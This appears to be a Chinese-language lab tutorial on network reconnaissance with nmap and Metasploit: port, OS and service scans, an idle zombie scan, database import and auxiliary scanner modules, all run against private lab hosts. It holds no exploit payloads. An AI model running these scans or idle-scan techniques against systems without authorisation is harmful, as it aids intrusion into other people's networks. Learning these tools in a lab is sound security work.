#nmap -sT 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:44 CSTNmap scan report for 192.168.0.106Host is up (0.0013s latency).Not shown: 978 closed tcp ports (conn-refused)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds

UDP掃描 -sU

返回Open、Open|filtered,速度很慢,filtered可能是Open,可能是Closed

#nmap -sU 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:47 CSTStats: 0:17:39 elapsed; 0 hosts completed (1 up), 1 undergoing UDP ScanUDP Scan Timing: About 99.44% done; ETC: 13:05 (0:00:06 remaining)Nmap scan report for 192.168.0.106Host is up (0.00064s latency).Not shown: 992 closed udp ports (port-unreach)PORT     STATE         SERVICE137/udp  open          netbios-ns138/udp  open|filtered netbios-dgm500/udp  open|filtered isakmp1900/udp open|filtered upnp4500/udp open|filtered nat-t-ike5050/udp open|filtered mmcc5353/udp open|filtered zeroconf5355/udp open|filtered llmnrMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1080.72 seconds

掃描全部端口 -p "*"

#nmap -p "*" 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:49 CSTNmap scan report for 192.168.0.106Host is up (0.0039s latency).Not shown: 8319 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http105/tcp  open  csnet-ns106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s1536/tcp open  ampr-inter1537/tcp open  sdsc-lm1538/tcp open  3ds-lm1539/tcp open  intellistor-lm1540/tcp open  rds1552/tcp open  pciarray1639/tcp open  cert-initiator2224/tcp open  efi-mg2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5040/tcp open  unknown5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 3.69 seconds

掃描頻率最高的n個端口 –top-ports n

#nmap -top-ports 10  192.168.0.106 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:54 CSTNmap scan report for 192.168.0.106Host is up (0.00039s latency).PORT     STATE  SERVICE21/tcp   open   ftp22/tcp   closed ssh23/tcp   closed telnet25/tcp   open   smtp80/tcp   open   http110/tcp  open   pop3139/tcp  open   netbios-ssn443/tcp  open   https445/tcp  open   microsoft-ds3389/tcp closed ms-wbt-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

掃描指定端口 -p port

# nmap -p 8100 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:02 CSTNmap scan report for 192.168.0.106Host is up (0.00056s latency).PORT     STATE SERVICE8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

掃描操作系統

nmap掃描操作系統采用主動方式,15個探針,不能正確發現,僅做推測。

最基本的掃描 -O

# nmap -O 192.168.0.161Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:05 CSTStats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping ScanARP Ping Scan Timing: About 100.00% done; ETC: 13:05 (0:00:00 remaining)Nmap scan report for 192.168.0.161Host is up (0.0017s latency).Not shown: 977 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp22/tcp   open  ssh23/tcp   open  telnet25/tcp   open  smtp53/tcp   open  domain80/tcp   open  http111/tcp  open  rpcbind139/tcp  open  netbios-ssn445/tcp  open  microsoft-ds512/tcp  open  exec513/tcp  open  login514/tcp  open  shell1099/tcp open  rmiregistry1524/tcp open  ingreslock2049/tcp open  nfs2121/tcp open  ccproxy-ftp3306/tcp open  mysql5432/tcp open  postgresql5900/tcp open  vnc6000/tcp open  X116667/tcp open  irc8009/tcp open  ajp138180/tcp open  unknownMAC Address: 00:0C:29:FA:DD:2A (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.33Network Distance: 1 hopOS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.01 seconds

盡對“具有Open和Closed的端口”進行掃描 -O --osscan-limit

nmap -O --osscan-limit 192.168.0.158Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 14:37 CSTNmap scan report for 192.168.0.158Host is up (0.0068s latency).Not shown: 991 closed tcp ports (reset)PORT      STATE SERVICE135/tcp   open  msrpc139/tcp   open  netbios-ssn445/tcp   open  microsoft-ds49152/tcp open  unknown49153/tcp open  unknown49154/tcp open  unknown49155/tcp open  unknown49156/tcp open  unknown49157/tcp open  unknownMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 update 1Network Distance: 1 hopOS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.98 seconds

猜測最接近目標端口的操作系統 -O --osscan-guest

需要root權限

# nmap -O --osscan-guess 192.168.0.159Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 14:42 CSTNmap scan report for 192.168.0.159Host is up (0.0092s latency).All 1000 scanned ports on 192.168.0.159 are in ignored states.Not shown: 1000 closed tcp ports (reset)MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Too many fingerprints match this host to give specific OS detailsNetwork Distance: 1 hopOS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds

掃描目標服務

掃描技術

對端口掃描:默認用SYN進行掃描

對服務識別:發出探針報文,返回確認值,確認服務

對版本識別:發出探針報文,返回報文信息,分析出服務的版本

掃描服務 -sV

# nmap -sV 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-15 10:19 CSTNmap scan report for 192.168.0.106Host is up (0.00034s latency).Not shown: 985 closed tcp ports (reset)PORT STATE SERVICE VERSION80/tcp   open  httpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)135/tcp  open  msrpc   Microsoft Windows RPC139/tcp  open  netbios-ssn Microsoft Windows netbios-ssn443/tcp  open  ssl/httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)445/tcp  open  microsoft-ds?902/tcp  open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)912/tcp  open  vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)1433/tcp open  ms-sql-sMicrosoft SQL Server 2014 12.00.22692383/tcp open  ms-olap4?3000/tcp open  ppp?3306/tcp open  mysql   MariaDB (unauthorized)5555/tcp open  freeciv?8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)8080/tcp open  httpApache Tomcat/Coyote JSP engine 1.18100/tcp open  httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :=====NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)=======SF-Port3000-TCP:V=7.92%I=7%D=6/15%Time=62A941D5%P=x86_64-pc-linux-gnu%r(GeSF:nericLines,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Type:x20tSF:ext/plain;x20charset=utf-8rnConnection:x20closernrn400x20BadxSF:20Request")%r(GetRequest,174,"HTTP/1.0x20302x20FoundrnCache-ControSF:l:x20no-cachernContent-Type:x20text/html;x20charset=utf-8rnExpirSF:es:x20-1rnLocation:x20/loginrnPragma:x20no-cachernSet-Cookie:SF:x20redirect_to=%2F;x20Path=/;x20HttpOnly;x20SameSite=LaxrnX-ContenSF:t-Type-Options:x20nosniffrnX-Frame-Options:x20denyrnX-Xss-ProtectSF:ion:x201;x20mode=blockrnDate:x20Wed,x2015x20Junx202022x2002:20SF::09x20GMTrnContent-Length:x2029rnrnSF:/a>.nn")%r(Help,67,"HTTP/1.1x20400x20Badx20RequestrnContent-TySF:pe:x20text/plain;x20charset=utf-8rnConnection:x20closernrn400SF:x20Badx20Request")%r(HTTPOptions,12E,"HTTP/1.0x20302x20FoundrnCacSF:he-Control:x20no-cachernExpires:x20-1rnLocation:x20/loginrnPraSF:gma:x20no-cachernSet-Cookie:x20redirect_to=%2F;x20Path=/;x20HttpOSF:nly;x20SameSite=LaxrnX-Content-Type-Options:x20nosniffrnX-Frame-OSF:ptions:x20denyrnX-Xss-Protection:x201;x20mode=blockrnDate:x20WeSF:d,x2015x20Junx202022x2002:20:14x20GMTrnContent-Length:x200rnSF:rn")%r(RTSPRequest,67,"HTTP/1.1x20400x20Badx20RequestrnContent-TSF:ype:x20text/plain;x20charset=utf-8rnConnection:x20closernrn400SF:x20Badx20Request")%r(SSLSessionReq,67,"HTTP/1.1x20400x20Badx20ReqSF:uestrnContent-Type:x20text/plain;x20charset=utf-8rnConnection:x2SF:0closernrn400x20Badx20Request")%r(TerminalServerCookie,67,"HTTP/1SF:.1x20400x20Badx20RequestrnContent-Type:x20text/plain;x20charsetSF:=utf-8rnConnection:x20closernrn400x20Badx20Request")%r(TLSSessSF:ionReq,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Type:x20text/SF:plain;x20charset=utf-8rnConnection:x20closernrn400x20Badx20ReSF:quest")%r(Kerberos,67,"HTTP/1.1x20400x20Badx20RequestrnContent-TySF:pe:x20text/plain;x20charset=utf-8rnConnection:x20closernrn400SF:x20Badx20Request")%r(FourOhFourRequest,1A1,"HTTP/1.0x20302x20FoundSF:rnCache-Control:x20no-cachernContent-Type:x20text/html;x20charsetSF:=utf-8rnExpires:x20-1rnLocation:x20/loginrnPragma:x20no-cacheSF:rnSet-Cookie:x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txtSF:%252ebak;x20Path=/;x20HttpOnly;x20SameSite=LaxrnX-Content-Type-OptSF:ions:x20nosniffrnX-Frame-Options:x20denyrnX-Xss-Protection:x201;SF:x20mode=blockrnDate:x20Wed,x2015x20Junx202022x2002:20:40x20GMTSF:rnContent-Length:x2029rnrnSF:);===NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)=======SF-Port5555-TCP:V=7.92%I=7%D=6/15%Time=62A941D5%P=x86_64-pc-linux-gnu%r(GeSF:nericLines,138,"HTTP/1.0x20200x20OKrnCache-Control:x20no-cacherSF:nPragma:x20no-cachernExpires:x200rncharset:x20UTF8rnX-Frame-OpSF:tions:x20DENYrnX-XSS-Protection:x201;x20mode=blockrnX-Content-TySF:pe-Options:x20nosniffrnContent-Type:x20text/htmlrnrn{"STATUS"SF::x20"REDIRECT",x20"RESPONSE":x20"mlogin.html",x20"ExtendedRSF:esponse":x20[{"last_notification_change_ts"x20:x20""}]}")%r(GSF:etRequest,2D,"HTTP/1.0x20302x20FoundrnLocation:x20mlogin.htmlrSF:nrn")%r(HTTPOptions,2D,"HTTP/1.0x20302x20FoundrnLocation:x20mloSF:gin.htmlrnrn")%r(RTSPRequest,2D,"HTTP/1.0x20302x20FoundrnLocaSF:tion:x20mlogin.htmlrnrn")%r(FourOhFourRequest,6E,"HTTP/1.1x2040SF:4x20Notx20FoundrnCache-Control:x20max-age=3600,x20must-revalidateSF:rnExpires:x20Thu,x2015x20Junx202023x2002:21:07x20GMTrn")%r(SISF:POptions,138,"HTTP/1.0x20200x20OKrnCache-Control:x20no-cachernPSF:ragma:x20no-cachernExpires:x200rncharset:x20UTF8rnX-Frame-OptiSF:ons:x20DENYrnX-XSS-Protection:x201;x20mode=blockrnX-Content-TypeSF:-Options:x20nosniffrnContent-Type:x20text/htmlrnrn{"STATUS":SF:x20"REDIRECT",x20"RESPONSE":x20"mlogin.html",x20"ExtendedResSF:ponse":x20[{"last_notification_change_ts"x20:x20""}]}");MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 132.23 seconds

nmap組合掃描

# nmap -Pn -sS 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 12:35 CSTNmap scan report for 192.168.0.106Host is up (0.00014s latency).Not shown: 985 closed tcp ports (reset)PORT STATE SERVICE80/tcp   open  http135/tcp  open  msrpc139/tcp  open  netbios-ssn443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap43000/tcp open  ppp3306/tcp open  mysql5555/tcp open  freeciv8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.62 seconds

# nmap -Pn -sS -A 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 12:40 CSTNmap scan report for 192.168.0.106Host is up (0.00029s latency).Not shown: 985 closed tcp ports (reset)PORT STATE SERVICE VERSION80/tcp   open  httpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found135/tcp  open  msrpc   Microsoft Windows RPC139/tcp  open  netbios-ssn Microsoft Windows netbios-ssn443/tcp  open  ssl/httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)| ssl-cert: Subject: commonName=localhost| Not valid before: 2009-11-10T23:48:47|_Not valid after:  2019-11-08T23:48:47| http-title: Welcome to XAMPP|_Requested resource was https://192.168.0.106/dashboard/|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28|_ssl-date: TLS randomness does not represent time| tls-alpn: |_  http/1.1445/tcp  open  microsoft-ds?902/tcp  open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)912/tcp  open  vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)1433/tcp open  ms-sql-sMicrosoft SQL Server 2014 12.00.2269.00; RTM+| ms-sql-ntlm-info: |   Target_Name: DESKTOP-9A8VFKB|   NetBIOS_Domain_Name: DESKTOP-9A8VFKB|   NetBIOS_Computer_Name: DESKTOP-9A8VFKB|   DNS_Domain_Name: DESKTOP-9A8VFKB|   DNS_Computer_Name: DESKTOP-9A8VFKB|_  Product_Version: 10.0.17763|_ssl-date: 2022-06-20T04:43:40+00:00; +10s from scanner time.| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback| Not valid before: 2022-06-20T02:24:59|_Not valid after:  2052-06-20T02:24:592383/tcp open  ms-olap4?3000/tcp open  ppp?…

將掃描結果存為XML文件名和數據庫

將掃描結果存為XML文件名

#nmap -oX nmap.xml 192.168.0.106tarting Nmap 7.92 ( https://nmap.org ) at 2022-06-15 10:25 CSTNmap scan report for 192.168.0.106Host is up (0.00023s latency).Not shown: 985 closed tcp ports (reset)PORT STATE SERVICE80/tcp   open  http135/tcp  open  msrpc139/tcp  open  netbios-ssn443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap43000/tcp open  ppp3306/tcp open  mysql5555/tcp open  freeciv8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds#cat nmap.xml …

將掃描結果存為metasploit數據庫

1)先導入XML文件中

#nmap -Pn -sS -A -oX nmap.xml 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-21 13:30 CSTNmap scan report for 192.168.0.106Host is up (0.00071s latency).All 1000 scanned ports on 192.168.0.106 are in ignored states.Not shown: 1000 filtered tcp ports (no-response)MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Too many fingerprints match this host to give specific OS detailsNetwork Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1   0.71 ms 192.168.0.106OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 26.18 seconds

2)再導入數據庫中

msf6 > db_import /home/jerry/nmap.xml[*] Importing 'Nmap XML' data[*] Import: Parsing with 'Nokogiri v1.13.1'[*] Importing host 192.168.0.106[*] Successfully imported /home/jerry/nmap.xmlmsf6 > hosts -c addressHosts=====address-------192.168.0.106192.168.0.155

msf 也可以和mysql 一起工作,在bt5r1中msf 默認支持連接mysql:

msf> db_driver mysqlmsf> db_connect root:123456@127.0.0.1/msf3 #連接本機mysql 的msf3 數據庫

mysql 默認密碼123456,使用db_connect 連接時會自動創建msf3 庫

metasploit使用數據庫掃描

簡介

#/etc/init.d/postgresql startStarting postgresql (via systemctl): postgresql.service.# msfconsolemsf> db_connect postgres:123456@127.0.0.1/msf(初始化為postgres:toor)[*] Connected to Postgres data service: 127.0.0.1/msf msf> db_status[*] Connected to msf. Connection type: postgresql.

TCP空閑掃描

找到空閑機器,利用空閑機掃描,好像不在本機上執行

空閑機器IPID, 使用IP幀標識機制的空閑機器

msf6 > use auxiliary/scanner/ip/ipidseqmsf6 auxiliary(scanner/ip/ipidseq) > optionsModule options (auxiliary/scanner/ip/ipidseq):Name   Current Setting  Required  Description----   ---------------  --------  -----------INTERFACEno   The name of the interfaceRHOSTS   yes   The target host(s), see https://github.com/rapid7/met asploit-framework/wiki/Using-MetasploitRPORT  80 yes   The target portSNAPLEN65535  yes   The number of bytes to captureTHREADS1 yes   The number of concurrent threads (max one per host)TIMEOUT500   yes   The reply read timeout in millisecondsmsf6 auxiliary(scanner/ip/ipidseq) > set rhost 192.168.0.0/24rhost => 192.168.0.0/24可以設置set rhost 192.168.0.0/24或set rhost 192.168.0.0-199或set rhost File://path/xxx.txtmsf6 auxiliary(scanner/ip/ipidseq) > set threads 50threads => 50windows:1-16Unix:1-128msf6 auxiliary(scanner/ip/ipidseq) > run[*] 192.168.0.1's IPID sequence class: All zeros[*] Scanned  82 of 256 hosts (32% complete)[*] Scanned  83 of 256 hosts (32% complete)[*] Scanned  98 of 256 hosts (38% complete)[*] 192.168.0.106's IPID sequence class: Incremental![*] Scanned 103 of 256 hosts (40% complete)[*] 192.168.0.161's IPID sequence class: All zeros[*] 192.168.0.158's IPID sequence class: Incremental![*] 192.168.0.152's IPID sequence class: Randomized[*] 192.168.0.151's IPID sequence class: Incremental![*] 192.168.0.159's IPID sequence class: All zeros[*] Scanned 128 of 256 hosts (50% complete)[*] Scanned 169 of 256 hosts (66% complete)[*] Scanned 183 of 256 hosts (71% complete)[*] Scanned 212 of 256 hosts (82% complete)[*] Scanned 232 of 256 hosts (90% complete)[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed msf6 auxiliary(scanner/ip/ipidseq) >

掃描到狀態為Incremental!

試圖通過192.168.0.151向192.168.0.161發包

msf6 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.0.151 192.168.0.161[*] exec: nmap -PN -sI 192.168.0.151 192.168.0.161Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 16:18 CSTIdle scan using zombie 192.168.0.151 (192.168.0.151:80); Class: IncrementalEven though your Zombie (192.168.0.151; 192.168.0.151) appears to be vulnerable to IP ID sequence prediction (class: Incremental), our attempts have failed.  This generally means that either the Zombie uses a separate IP ID base for each host (like Solaris), or because you cannot spoof IP packets (perhaps your ISP has enabled egress filtering to prevent IP spoofing), or maybe the target network recognizes the packet source as bogus and drops themQUITTING!

試圖通過192.168.0.106向192.168.0.161發包

msf6 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.0.106 192.168.0.161[*] exec: nmap -PN -sI 192.168.0.106 192.168.0.161Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 16:20 CSTIdle scan zombie 192.168.0.106 (192.168.0.106) port 80 cannot be used because it has not returned any of our probes -- perhaps it is down or firewalled.QUITTING!

不用自身IP地址項目表機器發送數據包,就可以獲得目標主機的開放端口

在MSF終端中執行nmap

msf6 > db_connect postgres:123456@127.0.0.1/msfmsf6 > db_nmap -sS -A 192.168.0.106msf6> services u #查看掃描結果msf6 > services -uServices========host           port  proto  name             state  info----           ----  -----  ----             -----  ----192.168.0.106  21    tcp    ftp              open   FileZilla ftpd 0.9.41 beta192.168.0.106  25    tcp    smtp             open   Mercury/32 smtpd Mail server account Maiser192.168.0.106  79    tcp    finger           open   Mercury/32 fingerd192.168.0.106  80    tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP192.168.0.106  106   tcp    pop3pw           open   Mercury/32 poppass service192.168.0.106  110   tcp    pop3             open   Mercury/32 pop3d192.168.0.106  135   tcp    msrpc            open   Microsoft Windows RPC192.168.0.106  139   tcp    netbios-ssn      open   Microsoft Windows netbios-ssn192.168.0.106  143   tcp    imap             open   Mercury/32 imapd 4.62192.168.0.106  443   tcp    ssl/http         open   Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28192.168.0.106  445   tcp    microsoft-ds     open192.168.0.106  902   tcp    ssl/vmware-auth  open   VMware Authentication Daemon 1.10 Uses VNC, SOAP192.168.0.106  912   tcp    vmware-auth      open   VMware Authentication Daemon 1.0 Uses VNC, SOAP192.168.0.106  1433  tcp    ms-sql-s         open   Microsoft SQL Server 2014 12.00.2269.00; RTM+192.168.0.106  2383  tcp    ms-olap4         open192.168.0.106  2869  tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP192.168.0.106  3306  tcp    mysql            open   MariaDB unauthorized192.168.0.106  5555  tcp    freeciv          open192.168.0.106  8000  tcp    http-alt         open   WSGIServer/0.2 CPython/3.8.0192.168.0.106  8009  tcp    ajp13            open   Apache Jserv Protocol v1.3192.168.0.106  8080  tcp    http             open   Apache Tomcat/Coyote JSP engine 1.1192.168.0.106  8100  tcp    http             open   Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28192.168.0.151  135   tcp    msrpc            open   Microsoft Windows RPC192.168.0.151  139   tcp    netbios-ssn      open   Microsoft Windows netbios-ssn192.168.0.151  445   tcp    microsoft-ds     open192.168.0.151  902   tcp    ssl/vmware-auth  open   VMware Authentication Daemon 1.10 Uses VNC, SOAP192.168.0.151  912   tcp    vmware-auth      open   VMware Authentication Daemon 1.0 Uses VNC, SOAP192.168.0.151  5357  tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP

使用Metasploit進行端口掃描

查詢端口掃描器

msf6 auxiliary(scanner/ip/ipidseq) > search portscanMathing Modules================#  NameDisclosure Date  RankCheck  Description-  ----  ---------------  ---------  -----------0 auxiliary/scanner/portscan/ftpbouncenormal  No FTP Bounce Port Scanner1 auxiliary/scanner/natpmp/natpmp_portscan normal  No NAT-PMP External Port Scanner2 auxiliary/scanner/sap/sap_router_portscanner normal  No SAPRouter Port Scanner3 auxiliary/scanner/portscan/xmas  normal  No TCP "XMas" Port Scanner4 auxiliary/scanner/portscan/ack  normal  No TCP ACK Firewall Scanner5 auxiliary/scanner/portscan/tcp  normal  No TCP Port Scanner6 auxiliary/scanner/portscan/syn normal  No TCP SYN Port Scanner7 auxiliary/scanner/http/wordpress_pingback_access normal  No  Wordpress Pingback LocatorInteract with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_accessmsf6 > use auxiliary/scanner/portscan/synmsf6 auxiliary(scanner/portscan/syn) > set rhost 192.168.0.106rhost => 192.168.0.106msf6 auxiliary(scanner/portscan/syn) > set threads 100threads => 100msf6 auxiliary(scanner/portscan/syn) > run[+]  TCP OPEN 192.168.0.155:135[+]  TCP OPEN 192.168.0.155:139[+]  TCP OPEN 192.168.0.155:445…

速度很慢,135、139、445…端口打開

利用輔助模塊

輔助模塊

查看目錄

# cd /usr/share/metasploit-framework/modules/auxiliary# ll總用量 108drwxr-xr-x 47 root root  4096  6月 24 17:25 admindrwxr-xr-x  2 root root  4096  6月 24 20:36 analyzedrwxr-xr-x  2 root root  4096  6月 24 20:36 bnatdrwxr-xr-x  8 root root  4096  6月 24 17:25 clientdrwxr-xr-x  4 root root  4096  6月 24 17:25 clouddrwxr-xr-x  2 root root  4096  6月 24 20:36 crawlerdrwxr-xr-x  2 root root  4096  6月 24 20:36 docxdrwxr-xr-x 27 root root  4096  6月 24 17:25 dos-rwxr-xr-x  1 root root  1473  6月 16 23:59 example.py-rw-r--r--  1 root root  1708  6月 16 23:59 example.rbdrwxr-xr-x  2 root root  4096  6月 24 20:36 fileformatdrwxr-xr-x 10 root root  4096  6月 24 17:25 fuzzersdrwxr-xr-x  2 root root 24576  6月 24 20:36 gatherdrwxr-xr-x  2 root root  4096  6月 24 20:36 parserdrwxr-xr-x  3 root root  4096  6月 24 17:25 pdfdrwxr-xr-x 87 root root  4096  6月 24 17:25 scannerdrwxr-xr-x  4 root root  4096  6月 24 20:36 serverdrwxr-xr-x  2 root root  4096  6月 24 20:36 snifferdrwxr-xr-x  9 root root  4096  6月 24 17:25 spoofdrwxr-xr-x  5 root root  4096  6月 24 17:25 sqlidrwxr-xr-x  2 root root  4096  6月 24 20:36 voipdrwxr-xr-x  5 root root  4096  6月 24 17:25 vsploit

查看模塊

msf6 > show auxiliaryAuxiliary=========   #     Name                                                                     Disclosure Date  Rank    Check  Description   -     ----        ---------------  ----    -----  -----------0     auxiliary/admin/2wire/xslt_password_reset   2007-08-15       normal  No     2Wire Cross-Site Request Forgery Password Reset Vulnerability1     auxiliary/admin/android/google_play_store_uxss_xframe_rce     normal  No     Android Browser RCE Through Google Play Store XFO2     auxiliary/admin/appletv/appletv_display_image                normal  No     Apple TV Image Remote Control3     auxiliary/admin/appletv/appletv_display_video                normal  No     Apple TV Video Remote Control4     auxiliary/admin/atg/atg_client                             normal  No     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client5     auxiliary/admin/aws/aws_launch_instances                  normal  No     Launches Hosts in AWS6     auxiliary/admin/backupexec/dump                         normal  No     Veritas Backup exec Windows Remote File Access7     auxiliary/admin/backupexec/registry                       normal  No     Veritas Backup exec Server Registry Access8     auxiliary/admin/chromecast/chromecast_reset               normal  No     Chromecast Factory Reset DoS9     auxiliary/admin/chromecast/chromecast_youtube            normal  No     Chromecast YouTube Remote Control10    auxiliary/admin/db2/db2rcmd       2004-03-04           normal  No     IBM DB2 db2rcmd.exe Command Execution Vulnerability11    auxiliary/admin/dcerpc/cve_2020_1472_zerologon           normal  Yes    Netlogon Weak Cryptographic Authentication…

使用輔助模塊

msf6> use scanner/http/webdav_scanner

案例:搜索不當的SQL Server

msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_pingmsf6 auxiliary(scanner/mssql/mssql_ping) > optionsModule options (auxiliary/scanner/mssql/mssql_ping):Name Current Setting  Required  Description   ---- ---------------  --------  -----------PASSWORD          noThe password for the specified usernameRHOSTS             yes   The target host(s), see https://github.com/   rapid7/metasploit-framework/wiki/Using-Meta sploitTDSENCRYPTION   false yes   Use TLS/SSL for TDS data "Force Encryption"THREADS  1yes   The number of concurrent threads (max one p   er host)USERNAMEsanoThe username to authenticate asUSE_WINDOWS_AUTHENT  false  yes   Use windows authentification (requires DOMA   IN option set)msf6 auxiliary(scanner/mssql/mssql_ping) > set rhost 192.168.0.106rhost => 192.168.0.106msf6 auxiliary(scanner/mssql/mssql_ping) > set THREADS 100THREADS => 100msf6 auxiliary(scanner/mssql/mssql_ping) > run[*] 192.168.0.106:        - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

協議掃描

SSH掃描

